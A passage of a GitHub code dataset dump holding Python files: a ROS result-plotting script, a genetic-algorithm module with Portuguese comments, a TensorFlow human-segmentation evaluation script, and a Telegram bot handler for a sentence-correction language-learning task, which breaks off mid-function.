(f\"{name[-1]}: Distance_avg: {distances[-1]:.2f} Distance_std: {distances_std[-1]:.2f} Orientation_avg: {orientations[-1]:.1f} Orientation_std: {orientations_std[-1]:.1f} reward: {rewards[-1]:.2f} ori_dif: {np.rad2deg(met['ori_dif']):0.2f}\")\n if is_sim:\n print (f\"{name[-1]}: ${distances[-1]:.2f}\\pm{distances_std[-1]:.1f}$ & ${orientations[-1]:.1f}\\pm{orientations_std[-1]:.1f}$ & ${rewards[-1]:.2f}$\")\n else:\n print (f\"{name[-1]}: ${distances[-1]:.2f}\\pm{distances_std[-1]:.1f}$ & ${orientations[-1]:.1f}\\pm{orientations_std[-1]:.1f}$ & ${rewards[-1]:.2f}$\")\n print (\"\\n\")\n\n #df = pd.DataFrame({'name': name, 'assess':[x for x in range(len(name))]})\n\n #plt.errorbar(range(len(df['name'])), orientations, orientations_std, fmt='o')\n #plt.xticks(range(len(df['name'])), df['name'])\n\nif __name__== \"__main__\":\n parser = argparse.ArgumentParser(description='input weight file of the network')\n parser.add_argument('--name', default=\"no_name\", type=str, help='name_traj')\n parser.add_argument('--file-name', default=\"no_name\", type=str, help='name_file_to_load')\n parser.add_argument('--folder-name', default=\"no_name\", type=str, help='name_file_to_load')\n parser.add_argument('--save', action='store_true')\n parser.add_argument('--load-file', action='store_true')\n parser.add_argument('--load-folder', action='store_true')\n parser.add_argument('--plot', action='store_true')\n parser.add_argument('--use-sim-data', action='store_true')\n parser.add_argument('--from-bag', action='store_true')\n args = parser.parse_args()\n\n node = rospy.init_node('plot_results')\n if args.load_folder:\n onlyfiles = [join(args.folder_name, f) for f in listdir(args.folder_name) if isfile(join(args.folder_name, f))]\n onlyfiles.sort()\n\n all_results = []\n for pkl_name in onlyfiles:\n result = Results()\n result.load(pkl_name)\n name_list = result.name.split(\"_\")\n if not args.use_sim_data and name_list[-1] != \"planner\" and name_list[-1] != \"line\":\n print (\"error \")\n continue\n new_name = f\"{name_list[-1]}_{name_list[-2]}_base_line\"\n result.name = new_name\n result.save(new_name)\n\n all_results.append(result)\n plot_all_results(all_results, args.use_sim_data)\n #plt.show()\n\n\n\n\n else:\n result = Results()\n if args.from_bag or args.load_file:\n if args.from_bag:\n result.wait_until_bag_finish()\n else:\n result.load(args.file_name, args.use_sim_data)\n else:\n print(\"exiting you need to load or read from bag file\")\n exit(0)\n\n if args.save:\n result.save(args.name)\n\n if args.plot:\n result.plot_calculate_metrics()\n","repo_name":"payamn/follow_ahead_rl","sub_path":"script/plot_bag.py","file_name":"plot_bag.py","file_ext":"py","file_size_in_byte":16796,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"34351875970","text":"import sys\n\nimport numpy as np\n\n\ndef cal_pop_fitness(equation_inputs, pop):\n # Cálculo do ‘fitness’ de cada solução na população atual\n # A função ‘fitness’ calcula a soma dos produtos entre cada\n # entrada e seu peso correspondente\n return np.sum(pop * equation_inputs, axis=1)\n\n\ndef select_mating_pool(pop, fitness, num_parents):\n # Selecionar os melhores indivíduos na geração atual\n # para seren pais para cruzamento\n parents = np.empty((num_parents, pop.shape[1]))\n\n for parent_num in range(num_parents):\n max_fitness_idx = np.where(fitness == np.max(fitness))\n max_fitness_idx = max_fitness_idx[0][0]\n parents[parent_num, :] = pop[max_fitness_idx, :]\n fitness[max_fitness_idx] = -sys.maxsize - 1\n\n return parents\n\n\ndef crossover(parents, offspring_size):\n offspring = np.empty(offspring_size)\n # o ponto onde o cruzamento acontece entre os dois genitores\n # geramos um número aleatório entre 1 e o tamanho do cromossomo\n crossover_point = np.random.randint(1, offspring_size[1])\n\n for k in range(offspring_size[0]):\n # índice do primeiro genitor\n parent1_idx = k % parents.shape[0]\n # índice do segundo genitor\n parent2_idx = (k+1) % parents.shape[0]\n # o novo filho terá a primeira parte de seus genes\n # oriunda do primeiro genitor\n offspring[k, 0:crossover_point] = parents[parent1_idx, 0:crossover_point]\n # o novo filho terá a segunda parte de seus genes\n # oriunda do segundo genitor\n offspring[k, crossover_point:] = parents[parent2_idx, crossover_point:]\n\n return offspring\n\n\ndef mutation(offspring_crossover, mutation_rate=0.3):\n # a mutação transforma um gene único em cada filho, aleatoriamente\n for idx in range(offspring_crossover.shape[0]):\n # a mutação só ocorrerá se dentro da 'mutation_rate' (por padrão 30%)\n if np.random.random() < mutation_rate:\n # O valor aleatório a ser adicionado\n random_idx = np.random.randint(0, offspring_crossover.shape[1])\n random_value = np.random.uniform(-1.0, 1.0, 1)\n offspring_crossover[idx, random_idx] = offspring_crossover[idx, random_idx] + random_value\n\n return offspring_crossover\n","repo_name":"gregori/genetic_algorithm","sub_path":"ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31994209418","text":"import numpy as np\nimport tensorflow as tf\nfrom data_utils import Dataset_Raw_Provide\nfrom net_main import SegmentationNetwork\nimport time\nimport utils as utils\nfrom initialize import _DATA_PATH, _CHKPT_PATH, _RESULT_PATH, _TINY\nimport os\nimport math\nfrom conv_defs import _CONV_DEFS\n\n'''\nScript to evaluate the network by using raw test data\n'''\n\n# TODO: Confusion matrix, IOU\ndef eval(dir_raw_record,\n batch_size,\n num_epochs,\n data_dims_from_ckpt = None,\n save_prediction_interval=1,\n show_last_prediction = True,\n load_from_chkpt=None,\n multi_deconv=1,\n conv_defs=_CONV_DEFS[0],\n mob_depth_multiplier=1.0,\n follow_up_convs = 0,\n sep_convs = False,\n depthsep_inter_norm_activn = True):\n '''\n Evaluate the network from tfRecords.\n :param dir_raw_record: Directory from which the data is produced\n :param batch_size: batch size\n :param num_epochs: number of epochs\n :param save_prediction_interval: n where per n predictions are saved\n :param show_last_prediction: true if you want to show the last prediction\n :param load_from_chkpt: file path for the checkpoint to be loaded\n :param multi_deconv: Set true to allow multiple layers in deconv network\n :param mob_f_ep: The mobilenet layer upto which the network must be built\n :param mob_depth_multiplier: depth multiplier of mobilenet to reduce the number of parameters\n :return:\n '''\n #dataset = Dataset_Raw_Provide(dir_raw_record,type='test')\n dataset = Dataset_Raw_Provide(dir_raw_record,type='test',val_fraction = 0.1, test_fraction = 0.1)\n data_dim = dataset.data_dim\n print('Data dimension: ', data_dim)\n print('Data dims from chkpt ', data_dims_from_ckpt)\n\n if load_from_chkpt and (not data_dims_from_ckpt == data_dim):\n print('The data dimensions from chkpt and data do not match')\n return\n\n depths = tf.placeholder(dtype=tf.float32, shape=[None, data_dim[0], data_dim[1], 1])\n labels = tf.placeholder(dtype=tf.int32, shape=[None, data_dim[0], data_dim[1]])\n\n model = SegmentationNetwork(depths,\n data_dim,\n is_training=False,\n dropout_keep_prob=1.0,\n multi_deconv=multi_deconv,\n conv_defs=conv_defs,\n mob_depth_multiplier=mob_depth_multiplier,\n follow_up_convs = follow_up_convs,\n sep_convs = sep_convs,\n depthsep_inter_norm_activn= depthsep_inter_norm_activn)\n\n print('deconv_logits shape: ', model.net_class.deconv_logits.shape)\n predictions = model.get_predictions()\n print('prediction shape', predictions.shape)\n\n cross_entropy_loss = model.loss(labels)\n\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n\n timestamp = utils.get_timestamp()\n evaluation_result_path = _RESULT_PATH + '_evaluation_raw_' + '%s' % timestamp + \"_batch_\" + str(\n batch_size) + \"_ckpt_\" + str(load_from_chkpt.split('/')[-1].split('.')[0]) + \"/\"\n if not os.path.exists(evaluation_result_path):\n os.makedirs(evaluation_result_path)\n test_details_file_path = evaluation_result_path + \"test_details.txt\"\n utils.print_test_details(batch_size, num_epochs, None, load_from_chkpt,\n test_details_file_path)\n metrics_file_path = evaluation_result_path + \"test_metrics.txt\"\n image_result_part_path = evaluation_result_path + \"test_image_\"\n pred_result_part_path = evaluation_result_path + \"human_0_rgb_\"\n loss_path = evaluation_result_path + \"loss.png\"\n with tf.Session() as sess:\n sess.run(init_op)\n step = 0\n step_vector = []\n loss_vector = []\n acc_vector = []\n TP_sum = np.zeros((10,))\n TN_sum = np.zeros((10,))\n FP_sum = np.zeros((10,))\n FN_sum = np.zeros((10,))\n\n if load_from_chkpt:\n utils.load_checkpoint(sess, load_from_chkpt)\n else:\n print('Error! Pass a checkpoint to load')\n return\n\n start_time = time.time()\n try:\n #while not coord.should_stop():\n dataset.initialize_epoch_for_raw_data(permutate=False)\n loopsize = math.floor(dataset.total_samples/batch_size)\n for iter in range(loopsize):\n # Run one step of the model. The return values are\n # the activations from the `train_op` (which is\n # discarded) and the `loss` op. To inspect the values\n # of your ops or variables, you may include them in\n # the list passed to sess.run() and the value tensors\n # will be returned in the tuple from the call.\n depths_data, labels_data = dataset.get_batch_from_raw_data(batch_size, convert2tensor=False)\n #depths_data = np.repeat(depths_data, 144, axis=0)\n #labels_data = np.repeat(labels_data, 144, axis=0)\n # print('shape depth: ', depths_data.shape, ' shape labels: ', labels_data.shape)\n loss, pred, corr_depth, corr_label = sess.run(\n [cross_entropy_loss, predictions, depths, labels], feed_dict={depths: depths_data, labels: labels_data})\n\n loss_value = np.mean(loss)\n\n # pred = sess.run(model.get_predictions())\n # last_label = sess.run(labels)\n\n # print('pred shape: ', pred.shape)\n # print('last label shape: ', last_label.shape)\n\n\n # Print an overview fairly often.\n if step % save_prediction_interval == 0:\n TP, TN, FP, FN = utils.get_confusion_matrix(pred, corr_label)\n TP_sum += TP\n TN_sum += TN\n FP_sum += FP\n FN_sum += FN\n acc = utils.accuracy_per_pixel(pred, corr_label)\n utils.print_metrics(loss=loss_value,accuracy=acc,step=step,metrics_file_path=metrics_file_path)\n step_vector.append(step)\n loss_vector.append(loss_value)\n #utils.visualize_predictions(pred[0],np.squeeze(corr_label[0]),np.squeeze(corr_depth[0]),path = image_result_part_path + str(step) + '.png')\n utils.save_predictions(pred[0], np.squeeze(corr_depth[0]),\n path=pred_result_part_path + str(step) + '.png', interpolation = 'bilinear')\n\n step += 1\n print('step: ',step)\n\n except tf.errors.OutOfRangeError:\n print('Done training for %d epochs, %d steps.' % (1, step))\n finally:\n end_time = time.time()\n print('Time taken for training: ', end_time - start_time)\n\n # Get IOU over complete data\n IOU = np.mean(TP_sum / (TP_sum + FP_sum + FN_sum + _TINY))\n metrics_file = open(metrics_file_path, 'a+')\n print('IOU OVER COMPLETE EVALUATION DATA: ' + str(IOU), file=metrics_file)\n metrics_file.close()\n\n utils.plot_loss(step_vector, loss_vector, loss_path, 'test')\n\nif __name__ == '__main__':\n # dataset = DataSet(num_poses=53, num_angles=360, max_records_in_tfrec_file=3600, val_fraction=0.01,\n # test_fraction=0.01)\n #dataset = DataSet(num_poses=1, num_angles=360, max_records_in_tfrec_file=360, val_fraction=0.1, test_fraction=0.1)\n\n #chkpt = _CHKPT_PATH + '2017_09_25_06_36_checkpoint-1.ckpt'\n\n #dir_raw_record = _DATA_PATH + 'raw_data_single_model_by_4'\n #dir_raw_record = '/home/neha/segmentation/' + 'data/blender_data/render_data'\n #dir_raw_record = '/home/neha/segmentation/' + 'data/blender_data/render_data_test'\n #dir_raw_record = _DATA_PATH + 'raw_data_single_model'\n\n #dir_raw_record = '/home/neha/Documents/data/blender_data/render_data_3000_1_pose_by_4'\n #dir_raw_record = '/home/neha/Documents/data/blender_data/render_data'\n\n dir_raw_record = '/media/neha/ubuntu/data/segmentation/render_data_corrected_TWO'\n\n batch_size = 2\n num_epochs = 1\n save_prediction_interval = 1\n #load_from_chkpt = _CHKPT_PATH + 'REMOTE_2018_03_31_23_58_checkpoint-1.ckpt'\n #load_from_chkpt = _CHKPT_PATH + '2018_04_05_08_53_checkpoint-1.ckpt'\n #load_from_chkpt = _CHKPT_PATH + 'REMOTE_b_50_md_1_total_300_2018_05_03_11_52_checkpoint-1.ckpt' #batch_of_50_multi-deconv=1\n #load_from_chkpt = _CHKPT_PATH + '2018_05_03_09_24_checkpoint-1.ckpt' #batch_of_100_multi-deconv=1, pairs = 300\n #load_from_chkpt = _CHKPT_PATH + '2018_05_03_11_52_checkpoint-1.ckpt' #batch_of_50_multi-deconv=1, pairs = 300\n #load_from_chkpt = _CHKPT_PATH + '2018_05_03_16_26_checkpoint-1.ckpt' #batch_of_10_multi-deconv=1, pairs = 300\n #load_from_chkpt = _CHKPT_PATH + '2018_05_03_22_56_checkpoint-1.ckpt' #batch_of_50_multi-deconv=2, pairs = 300\n #load_from_chkpt = _CHKPT_PATH + '2018_05_05_14_05_checkpoint-1.ckpt' #batch_of_50_multi-deconv=1, pairs =600\n\n # load_from_chkpt = _CHKPT_PATH + 'REMOTE_b_50_md_1_total_300_2018_05_03_11_52_checkpoint-1.ckpt' # batch_of_50_multi-deconv=1\n # load_from_chkpt = _CHKPT_PATH + '2018_05_16_07_55_checkpoint-1.ckpt' # batch_of_50_multi-deconv=1, corrected, 300, REMOTE\n # load_from_chkpt = _CHKPT_PATH + '2018_05_17_08_46_checkpoint-1.ckpt' # batch_of_50_multi-deconv=1, corrected, 300, standardized, REMOTE\n load_from_chkpt = _CHKPT_PATH + '2018_05_20_10_24_checkpoint-1.ckpt' # batch_of_50_multi-deconv=1, corrected_TWO - changed scale and positions to match kinect v1 domain, 300, REMOTE\n\n\n if not load_from_chkpt:\n print('You must provide a checkpoint to evaluate data')\n exit()\n\n multi_deconv, conv_def_num, mob_depth_multiplier, data_dims_from_ckpt, follow_up_convs, sep_convs, depthsep_inter_norm_activn = utils.get_model_details_from_chkpt_path(\n load_from_chkpt)\n conv_defs = _CONV_DEFS[conv_def_num]\n\n eval(dir_raw_record=dir_raw_record,\n batch_size=batch_size,\n num_epochs=num_epochs,\n data_dims_from_ckpt = data_dims_from_ckpt,\n save_prediction_interval=save_prediction_interval,\n load_from_chkpt=load_from_chkpt,\n multi_deconv=multi_deconv,\n conv_defs=conv_defs,\n mob_depth_multiplier=mob_depth_multiplier,\n follow_up_convs = follow_up_convs,\n sep_convs = sep_convs,\n depthsep_inter_norm_activn = depthsep_inter_norm_activn)\n","repo_name":"neha191091/human-segmentation","sub_path":"segmentation_python/evaluation_raw_data.py","file_name":"evaluation_raw_data.py","file_ext":"py","file_size_in_byte":10655,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"30548302226","text":"from telegram import (Update, ReplyKeyboardMarkup, ReplyKeyboardRemove)\nfrom telegram.ext import (\n CommandHandler, MessageHandler, Filters, ConversationHandler,\n CallbackContext)\nimport logging\nimport json\n\nfrom ..room_handler import end_task_group, get_room_manager_of_group, remove_room_manager_of_group\nfrom .. import state\nfrom ....backend.tasks.sentence_correction_storage import get_sentence_correction_task_of_group, remove_sentence_correction_task_of_group\nfrom ...util import get_gif_link, get_group_chat_id, send_animation, send_message, create_keyboard_markup\nfrom ....backend.db.task import insert_sentence_correction_adaptive_data_entry\n\n\nlogger = logging.getLogger(__name__)\n\n\nremove_keyboard_markup = ReplyKeyboardRemove()\nkeyboard_bool = create_keyboard_markup(['Correct', 'Incorrect'])\n\n\ndef task_selection(update: Update, context: CallbackContext):\n \"\"\"\n Evaluates task selection messages.\n If the sentence correction-task was requested by the right user,\n show the task-description, otherwise return to the task selection\n \"\"\"\n # Get room manager\n group_room_manager = get_room_manager_of_group(get_group_chat_id(update))\n # Get selected user who has to chose the task\n selected_usr = group_room_manager.get_selected_user()\n # Check if the message is from the selected user\n if update.message.from_user.username == selected_usr:\n # Set task in room manager\n group_room_manager.next_task(\"sentence correction\")\n return show_sentence_task_description(update, context)\n else:\n # Wait for message from the correct user -> go back to task selection\n return state.SEN_CORR_SEL_WRONG_USER\n\n\ndef show_sentence_task_description(update: Update, context: CallbackContext):\n group_chat_id = get_group_chat_id(update)\n sentence_task = get_sentence_correction_task_of_group(group_chat_id)\n send_message(sentence_task.get_task_instructions(),\n update, context, text_markup=True)\n\n gif_url = get_gif_link(\"fix_it\")\n send_animation(gif_url, update, context)\n\n return present_first_task_iteration(update, context)\n\n\ndef send_sentence(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Send sentence to all students and add custom response keyboard for selected user\n send_message(sentence_task.get_sentence_msg() + \"\\n\" + sentence_task.get_user_selected_msg(),\n update, context, reply_markup=keyboard_bool, text_markup=True)\n\n\ndef present_first_task_iteration(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Log info about proficiency\n logger.info('Test information: Start of sentence correction task')\n sentence_task.log_proficiencies()\n # Initialize iteration\n sentence_task.next_group_iteration()\n # Send info about first iteration\n send_message(sentence_task.get_first_iteration_info_msg(), update, context)\n # Randomly select a user\n sentence_task.select_next_user()\n # Send sentence to all students\n send_sentence(update, context)\n return state.SEN_CORR_WAIT_FOR_ANSWER_SENTENCE\n\n\ndef present_next_task_iteration(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n\n # Get adaptive data.\n sentence_adaptive_data_entry = sentence_task.get_adaptive_data_entry(\n get_group_chat_id(\n update))\n # Insert db entry.\n insert_sentence_correction_adaptive_data_entry(sentence_adaptive_data_entry)\n\n # Check if group iteration is finished\n if sentence_task.is_group_iteration_finished():\n # Check if all responses were correct:\n if sentence_task.is_correct_group_iteration():\n # Combine positive feedback and code + Recap of current codeword\n send_message(\n sentence_task.get_correct_group_iter_feedback() + \"\\n\" +\n sentence_task.get_codeword_recap(),\n update, context)\n # Increment counter\n sentence_task.increment_correct_group_iteration()\n\n else:\n # Feedback\n send_message(\n sentence_task.get_incorrect_group_iter_feedback(),\n update, context)\n # Increment counter\n sentence_task.increment_incorrect_group_iteration()\n\n # Reset everything in the iteration over the group\n sentence_task.next_group_iteration()\n\n # Check if task is finished\n if sentence_task.is_finished():\n # Get room manager for global tracking of repeatability\n group_room_manager = get_room_manager_of_group(\n get_group_chat_id(update))\n # increment repetitions counter\n group_room_manager.increment_task_rep_count(\"sentence correction\")\n # check if task can be repeated, i.e. check if the task repetition counter is less than 2\n if not sentence_task.is_success():\n if group_room_manager._reps_counter[\"sentence correction\"] < 2:\n # add task back to list of available tasks\n group_room_manager.repeat_current_task(\"sentence correction\")\n # End the task and go back to room manager\n return end_task(\n update, context, success=sentence_task.is_success(),\n codeword=sentence_task.get_codeword())\n # Log info about proficiency\n else:\n logger.info('Test information: Next sentence')\n sentence_task.log_proficiencies()\n # Send info about next iteration\n update.message.reply_text(\n text=sentence_task.get_next_iteration_info_msg(),\n quote=False)\n # Randomly select a user\n sentence_task.select_next_user()\n send_sentence(update, context)\n return state.SEN_CORR_WAIT_FOR_ANSWER_SENTENCE\n\n\ndef task_response_correct(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # First check if message was sent from the selected user\n if not check_selected_user(update):\n # Update adaptive data counter.\n sentence_task.n_messages_non_selected_users += 1\n return state.SEN_CORR_WAIT_FOR_ANSWER_SENTENCE\n\n # Update adaptive data counter.\n sentence_task.n_messages_selected_user += 1\n # User says sentence was correct via the reply keyboard\n return _task_response(update, context, True)\n\n\ndef task_response_incorrect(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # First check if message was sent from the selected user\n if not check_selected_user(update):\n # Update adaptive data counter.\n sentence_task.n_messages_non_selected_users += 1\n return state.SEN_CORR_WAIT_FOR_ANSWER_SENTENCE\n\n # Update adaptive data counter.\n sentence_task.n_messages_selected_user += 1\n # User says sentence was incorrect via the reply keyboard\n return _task_response(update, context, False)\n\n\ndef _task_response(update: Update, context: CallbackContext, response: bool):\n\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Get the truth about the sentence\n truth_answer = sentence_task.get_current_sentence_truth()\n # Different cases according to task flow\n\n if truth_answer == True and response == True:\n\n # Log user answer\n logger.info('Test information: User response = {}'.format(\n \"Sentence is correct\"))\n\n # Correct sentence and answer also correct -> Go to next user\n sentence_task.increment_correct_count()\n send_message(sentence_task.get_correct_response_feedback(),\n update, context, reply_markup=remove_keyboard_markup)\n\n # Update proficiencies and go to next task\n sentence_task.update_proficiencies(correct=True)\n return present_next_task_iteration(update, context)\n\n if truth_answer == True and response == False:\n # Log user answer\n logger.info(\n 'Test information: User response = {}'.format(\n \"Sentence is incorrect\"))\n # Correct sentence but incorrect answer\n send_message(sentence_task.get_feedback_no_error(), update,\n context, reply_markup=remove_keyboard_markup)\n # Update proficiencies and go to next task\n sentence_task.update_proficiencies(correct=False)\n return present_next_task_iteration(update, context)\n\n if truth_answer == False and response == True:\n\n # Log user answer\n logger.info('Test information: User response = {}'.format(\n \"Sentence is correct\"))\n\n # Incorrect sentence not identified\n send_message(sentence_task.get_feedback_missed_error(),\n update, context, reply_markup=remove_keyboard_markup)\n\n sentence_sub_types = sentence_task.curr_sentence.sub_types\n\n # Adaptibility: display appropriate grammar hint\n send_grammar_feedback(update, context, sentence_sub_types, \"hint\")\n\n return _identify_sentence_mistake(update, context)\n\n if truth_answer == False and response == False:\n # Log user answer\n logger.info(\n 'Test information: User response = {}'.format(\n \"Sentence is incorrect\"))\n # Incorrect sentence correctly identified\n send_message(sentence_task.get_correct_response_feedback(),\n update, context, reply_markup=remove_keyboard_markup)\n return _identify_sentence_mistake(update, context)\n\n\ndef send_grammar_feedback(\n update: Update, context: CallbackContext, sentence_sub_types: list,\n hint_type: str):\n \"\"\"Send message with a grammar tip that is shown when user\n assume sentence is correct when it's wrong.\n Used in Sentence Correction task.\n\n Args:\n sentence_sub_types -- sub types as list\n hint_type -- \"hint\" or \"grammar_rule\" - specifying the output type for the user\n \"\"\"\n # Log which sub_type user was not able to identify as wrong\n logger.info(f\"Wrong sentence of subtype {sentence_sub_types}\"\n \" marked as correct by user.\")\n\n # Add the subtype to tracker of already presented grammar rules\n group_chat_id = get_group_chat_id(update)\n sentence_task = get_sentence_correction_task_of_group(group_chat_id)\n\n if hint_type == \"grammar_rule\":\n sentence_task.grammar_rules_used.append(sentence_sub_types)\n\n # Retrieve appropriate feedback and send it as Telegram message\n feedback = get_grammar_tip(sentence_sub_types, hint_type)\n send_message(feedback, update, context)\n\n return\n\n\ndef get_grammar_tip(sub_types: list, hint_type: str):\n \"\"\"Get grammar tip from external text file depending\n on sub types of sentence. Used in Sentence Correction task.\n\n Args:\n sentence_sub_types -- sub types as list\n hint_type -- \"hint\" or \"grammar_rule\" - specifying the output type for the user\n \"\"\"\n\n category = sub_types[0]\n\n # with open('sentence_correction_tips_formating.json') as json_file:\n # grammar_rules = json.load(json_file)\n\n path_to_json = \"data/adaptivity/sentence_correction_tips_formating.json\"\n json_file = open(path_to_json)\n grammar_rules_dict = json.load(json_file)\n\n print(\"Category\", category, \"Value\", category.value)\n print(\"hint type\", hint_type)\n print(type(grammar_rules_dict))\n print(list(grammar_rules_dict.keys()))\n print(\"Number of keys\", len(list(grammar_rules_dict.keys())))\n print(\"category.value Type\", type(category.value))\n print(\"category.value to string\", type(str(category.value)))\n\n return grammar_rules_dict[str(category.value)][hint_type]\n\n\ndef check_selected_user(update):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n return update.message.from_user.username == sentence_task.get_selected_user()\n\n\ndef _identify_sentence_mistake(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Log info about asking for identification\n logger.info('Test information: User asked for error identification')\n # Send message to identify the erroneous word\n # Get words as a list\n sentence_words = sentence_task.get_curr_sentence_words()\n # Send message with keyboard markup that contains the words\n send_message(sentence_task.get_identification_msg(),\n update, context,\n reply_markup=create_keyboard_markup(\n options=sentence_words))\n return state.SEN_CORR_WAIT_FOR_ANSWER_IDENTIFICATION\n\n\ndef evaluate_sentence_mistake_identification(\n update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # First check if message was sent from the selected user\n if not check_selected_user(update):\n # Update adaptive data counter.\n sentence_task.n_messages_non_selected_users += 1\n return state.SEN_CORR_WAIT_FOR_ANSWER_IDENTIFICATION\n\n # Update adaptive data counter.\n sentence_task.n_messages_selected_user += 1\n # Get the text from the message\n response = update.message.text\n # Check if the response is a word in the sentence and go back to waiting for a response\n if not sentence_task.is_response_in_words(response):\n return state.SEN_CORR_WAIT_FOR_ANSWER_IDENTIFICATION\n\n # Check against truth\n if sentence_task.check_error_identification(response):\n # Positive feedback\n send_message(\n sentence_task.get_feedback_correct_error_identification(),\n update, context, reply_markup=remove_keyboard_markup)\n # Error correction\n return _correct_sentence_mistake(update, context)\n\n else:\n # Inform about mistake\n send_message(\n sentence_task.get_feedback_incorrect_error_identification(),\n update, context, reply_markup=remove_keyboard_markup)\n # Update proficiencies and go to next task\n sentence_task.update_proficiencies(correct=False)\n\n sentence_sub_types = sentence_task.curr_sentence.sub_types\n\n # Adaptability: display appropriate grammar rule\n send_grammar_feedback(\n update, context, sentence_sub_types, \"grammar_rule\")\n\n return _correct_sentence_mistake(update, context)\n\n\ndef _correct_sentence_mistake(update: Update, context: CallbackContext):\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n # Log info about asking for correction\n logger.info('Test information: User asked for sentence correction')\n send_message(sentence_task.get_correction_msg(), update, context)\n\n return state.SEN_CORR_WAIT_FOR_ANSWER_CORRECTION\n\n\ndef get_message_length(msg):\n return len(msg.split(\" \"))\n\n\ndef evaluate_sentence_mistake_correction(\n update: Update, context: CallbackContext):\n\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n\n # First check if message was sent from the selected user\n if not check_selected_user(update):\n\n # Update adaptive data counter.\n sentence_task.n_messages_non_selected_users += 1\n return state.SEN_CORR_WAIT_FOR_ANSWER_CORRECTION\n\n # Update adaptive data counter.\n sentence_task.n_messages_selected_user += 1\n # Get the message\n response = update.message.text\n\n # Check if message is not longer than one word -> ignore rest\n if not get_message_length(response) == 1:\n return state.SEN_CORR_WAIT_FOR_ANSWER_CORRECTION\n\n # TODO: Specify when a response from the user is the actual response\n\n # Check response against truth\n if sentence_task.check_error_correction(response):\n\n # Increment number of correct responses\n sentence_task.increment_correct_count()\n\n # Positive feedback\n gif_url = get_gif_link(\"correct\")\n send_animation(gif_url, update, context)\n send_message(\n sentence_task.get_feedback_correct_error_correction(),\n update, context)\n\n # Update proficiencies\n sentence_task.update_proficiencies(correct=True)\n # Go to next task\n return present_next_task_iteration(update, context)\n\n else:\n # Inform about mistake\n msg = sentence_task.get_feedback_incorrect()\n if sentence_task.second_chance:\n msg += sentence_task.get_feedback_error_correction()\n sentence_task.second_chance = False\n send_message(msg, update, context)\n # Update proficiencies and go to next task\n\n sentence_sub_types = sentence_task.curr_sentence.sub_types\n\n # Give a learning opportunity in case the grammar rule has not been presented yet - present the rule and give one more try\n group_chat_id = get_group_chat_id(update)\n sentence_task = get_sentence_correction_task_of_group(group_chat_id)\n\n if sentence_sub_types in sentence_task.grammar_rules_used:\n sentence_task.update_proficiencies(correct=False)\n msg = sentence_task.get_feedback_error_correction()\n send_message(msg, update, context, text_markup=True)\n return present_next_task_iteration(update, context)\n\n else:\n send_grammar_feedback(\n update, context, sentence_sub_types, \"grammar_rule\")\n\n msg = sentence_task.get_try_again_msg(\n sentence_task.curr_sentence.get_str())\n msg += \"\\n\" + sentence_task.get_user_selected_msg()\n send_message(msg, update, context, text_markup=True)\n\n sentence_task.second_chance = True\n\n return _correct_sentence_mistake(update, context)\n\n\ndef end_task(update: Update, context: CallbackContext, success: bool,\n codeword: str):\n # Log info about proficiency\n logger.info('Test information: End of sentence correction task')\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n\n # Get adaptive data.\n sentence_adaptive_data_entry = sentence_task.get_adaptive_data_entry(\n get_group_chat_id(\n update))\n # Insert db entry.\n insert_sentence_correction_adaptive_data_entry(sentence_adaptive_data_entry)\n\n sentence_task.log_proficiencies()\n\n # Send achievement info\n # Inform group\n update.message.reply_text(\n text='Alright, let us check for new achievements ...', quote=False)\n # Get all members of the group\n all_students = sentence_task.all_users\n # Boolean to check if new achievements have been completed (default is False)\n new_achievements_completed = False\n # Check and display achievements for each member\n for student in all_students:\n # Update achievements\n new_achievements = student.update_achievements()\n # Inform about new achievements (TODO: Should be done in private chat maybe -> More difficult to implement)\n if len(new_achievements) > 0:\n # New achievements have been completed\n new_achievements_completed = True\n # Create string with achievement descriptions as new lines\n achievement_text = '\\n'.join(map(str, new_achievements))\n # Inform about new achievements\n update.message.reply_text(\n text='Congratulation {}, you earned the following achievements: \\n{}'.\n format(\n student.get_name(),\n achievement_text),\n quote=False)\n # Send goodbye depending on new achievements being completed\n if new_achievements_completed:\n update.message.reply_text(\n text='Those were all new achievements.', quote=False)\n else:\n update.message.reply_text(\n text='I found no new achievements.', quote=False)\n\n remove_sentence_correction_task_of_group(get_group_chat_id(update))\n\n # End the task -> Send dialogue and go to password entering\n return end_task_group(\n update, context, success=success, codeword=codeword,\n state_success=state.SEN_CORR_END_SUCCESS,\n state_fail=state.SEN_CORR_END_FAIL)\n\n\ndef stop_task(update: Update, context: CallbackContext):\n # Log info about proficiency\n logger.info('Test information: End of sentence correction task')\n sentence_task = get_sentence_correction_task_of_group(\n get_group_chat_id(\n update))\n sentence_task.log_proficiencies()\n\n # Send achievement info\n # Inform group\n update.message.reply_text(\n text='Alright, let us check for new achievements ...', quote=False)\n # Get all members of the group\n all_students = sentence_task.all_users\n # Boolean to check if new achievements have been completed (default is False)\n new_achievements_completed = False\n # Check and display achievements for each member\n for student in all_students:\n # Update achievements\n new_achievements = student.update_achievements()\n # Inform about new achievements (TODO: Should be done in private chat maybe -> More difficult to implement)\n if len(new_achievements) > 0:\n # New achievements have been 